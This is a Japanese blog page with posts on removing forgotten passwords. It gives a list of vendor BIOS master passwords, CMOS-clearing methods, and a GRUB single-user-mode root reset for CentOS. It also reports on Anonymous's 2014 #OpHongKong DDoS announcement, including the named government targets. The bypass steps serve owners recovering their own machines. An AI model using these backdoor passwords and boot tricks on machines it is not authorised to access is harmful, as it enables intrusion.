    200X年以前の古いパソコンであれば、メーカーがデバッグやサポート用に設定しているマスターパスワードが有効になっている場合があります。 古いパソコンでなければ、あまり期待は出来ませんが簡単に試すことが出来るので、やってみる価値はあると思います。当たればラッキーくらいの気持で試してみるとよいと思います。  
    これらのマスターパスワードは、多くのWebサイトで公開されています。

    Index - BIOS-Chips - Verkauf und Programmierung - BIOS-Updates - BIOS-Recovery - BIOS-Repair - biosflash.com    
    http://www.biosflash.com/index.htm

                                                                                                                                                                                     
    マスターパスワードの例
    AWORD 01322222, bios, lkw peter, 1EAAh, BIOS, lkwpeter, 256256, biostar など
    AMI ami, amiami, CMOSPWD, amidecod, AMI.KEY, KILLCMOS など
    Phoenix 12345
    Hewlett-Packard CNU1234ABC
    Dell 1234567-595B, 1234567-D35B, 1234567-2A7B
    Compaq 12345
    Sony 1234567
    Samsung 07088120410C0000

    3. CMOSクリアする方法

    (1) マザーボード上のボタン電池を外してCMOS情報をクリアする方法

    BIOS のパスワードを含む設定情報は、マザーボード上にあるCMOSと呼ばれるメモリ上に保存されています。CMOSは電源を切ると情報が消えてしまいますが、マザーボードのボタン電池により常に電力を供給することによって設定を保っています。  
    CMOSに電力を供給しているボタン電池をはずすことによって BIOSパスワードを含む設定情報をクリアすることが出来ます。  
    マザーボード上のボタン電池をはずして 2~3 分ほど放置する必要があります。

    (2)CMOSクリアボタンでクリアする方法

    スポンサーリンク

    マザーボード上にCOMSをクリアするためのボタンを用意している機種もあります。  
    このボタンを押すことによってCMOSの情報をクリアにして、パスワード設定を消すことが可能です。

    HP Compaq Pro 4300 SF - CMOS ボタンで BIOS の設定を初期化する方法    
    http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03790899

    (3)ジャンパキャップでクリアする方法

    マザーボード上に「CLR COMS」や「CLRTC」と記載のある場所のジャンパピンを変更することによって、CMOSの情報をクリアすることが可能です。ジャンパピンの変更位置は、機種によって異なります。下記の画像は、ASUSマザーボードの場合の例です。見ずらいですが、赤く囲った部分が「CLRTC」のジャンパピンになります。通常はマザーボードのボタン電池の近くにあります。わかりずらいですがよく見ると見つかりますので探してみてください。

    CLRTC

    上記画像は、https://pixabay.com/static/uploads/photo/2015/08/11/11/50/asus-884108_960_720.jpg を利用させていだきました。


    4. 関連リンク


    スポンサーリンク

    CentOS / Red Hat Linux root パスワードをうっかり忘れたときに再設定する方法

    CentOS / Red Hat Linux root パスワードをうっかり忘れたときに再設定する方法


    キーワード: CentOS、Rootパスワード、パスワード解除、パスワード再設定

    このエントリーをはてなブックマークに追加

    スポンサーリンク

    概要

    CentOS / Red Hat Linux  をシングルユーザモードで起動して、password コマンドでパスワードを再設定します。シングルユーザモードで起動すると、パスワードなしで root のシェル(shell)を利用することが出来ます。この root のシェルから password コマンドで root のパスワードを再設定します。

    1. CentOS / Red Hat Linux をシングルユーザーモードで起動
    2. passwd コマンドでパスワードを再設定

    手順

    1. 電源を押してすぐに「Enter」を押すと、grub 画面が表示される
    2. キーボードの「e」を押して編集モードに切り替える
    3. kernel で始まる行を選択してキーボードの「e」を押す
    4. スポンサーリンク

    5. 行の最後にシングルユーザーモードでブートするための指定「S」を追加して、「Enter」を押す
    6. 「Enter」を押すとシングルユーザーモードでブートして、root シェルが起動する
    7.  

    8. password コマンドで root のパスワードを変更する

    スポンサーリンク

    関連リンク

    アノニマス(Anonymous)が中国・香港の政府への攻撃を予告 #OpHongKong/#OpHK/#OcuppyHK 2014年10月10日

    アノニマス(Anonymous)が中国・香港の政府への攻撃を予告 #OpHongKong/#OpHK 2014年10月10日

                                       

    概要

    アノニマス(Anonymous)は、10月10日、サイバー攻撃によって中国と香港の政府ウェブサイトをサービス停止させ、政府関係の電子メールアドレス情報を流出させると予告した。この攻撃予定日は10月11日、攻撃対象は中国の公安省、香港警察、国防省、司法省などとなっている。

    「中国よ、われわれを止めることはできない。香港市民に対して権力を乱用する前にわれわれの攻撃を予想するべきだった」との声明を発表しており、香港での民主的な選挙を求める抗議と見られる。

    今回のアノニマス(Anonymous)のオペレーション名は #OpHongKong、#OpHK, #OccupyHK となっている。


    予告原文

    #Anonymous
    #AntiSec

    @AnonymousGlobo
    @OpHongKong

    October 11th starting at 1pm MST we will be conducting the #OpHongKong twitterstorm.

    A message to the Chinese Government:

    This twitterstorm is to show how much support we have around the world.  To prove our point to you, if it is not clear as of now, we will also be launching a mass DDoS attack on Chinese Government servers.  Here's your heads up, prepare for us, try to stop it, the only success you will have will be taking all your sites offline.

    Here, we'll even help you out:
    Some of our top targets:
    www.mps.gov.cn - Chinese Police
    www.police.gov.hk - Hong Kong Police
    www.mod.gov.cn - Ministry of Defence of China
    www.moj.gov.cn - Ministry of Justice for China

    China, you cannot stop us.
    You should have expected us before abusing your power against the citizens of Hong Kong
    We Are Anonymous
    We Don't Forgive
    We Don't Forget
    We Stand in Solidarity with the Citizens of Hong Kong
    Chinese Government, October 11th, Expect us.

    攻撃・被害状況

    • nftz.gov.cn のデータベースから500件以上のメールアドレスをリーク
      hxxp://pastebin.com/uwf●jurt

    • 2014/10/12~、An0nymousAsia が上海商業銀行(http://ww.shacombank.com.hk/)に対してDDoS攻撃を行う WebHIVE を公開
      ※WebHIVEにアクセスすると自動的に攻撃に加担することになってしまうため注意が必要

      OpHongkon


    • http://www.tlnbcq.gov.cn/ が改ざんされている(2014-10-15)

      ophk-tlnbcq

    参考URL


      より以前の記事一覧

      記事一覧

      スポンサードリンク


      Twitter


      無料ブログはココログ

      ブログ検索